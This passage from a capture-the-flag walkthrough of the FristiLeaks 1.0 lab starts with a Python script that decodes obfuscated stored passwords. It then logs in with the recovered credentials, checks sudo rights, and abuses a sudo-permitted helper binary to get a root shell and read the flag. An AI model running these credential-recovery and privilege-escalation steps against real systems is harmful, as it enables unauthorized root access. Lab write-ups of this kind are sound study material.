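# Encoding as cryptpass.py does it: base64 -> reverse -> rot13.
def encode_string(plain: str) -> str:
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


# Inverse: rot13 (self-inverse) -> un-reverse -> base64-decode.
def decode_string(token: str) -> str:
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def decode_many(tokens):
    """Decode several stored tokens at once; returns {token: plaintext}."""
    return {t: decode_string(t) for t in tokens}


def round_trips(plain: str) -> bool:
    """True when decode(encode(x)) == x, i.e. the transform is lossless."""
    return decode_string(encode_string(plain)) == plain


if __name__ == "__main__":
    # The two tokens recovered from cryptedpass.txt and whoisyourgodnow.txt.
    for token, plain in decode_many(["mVGZ3O3omkJLmy2pcuTq",
                                     "=RFn0AKnlMHMPIzpyuTI0ITG"]).items():
        print(token, "->", plain)
    print(encode_string("thisisalsopw123"))
```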
Checking the sudo privileges of each user with `sudo -l`:
bash-4.1$ su admin
su admin
Password: thisisalsopw123
[admin@localhost ~]$ sudo -l
sudo -l
[sudo] password for admin: thisisalsopw123
Sorry, user admin may not run sudo on localhost.
admin has no sudo entries. Now checking fristigod:
[admin@localhost ~]$ exit
exit
exit
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$
fristigod may run the program /var/fristigod/.secret_admin_stuff/doCom as the user fristi via sudo, so let's try executing it:
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
As we can see, we got a root shell. Now search for the flag:
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1#
That's it, we found the flag.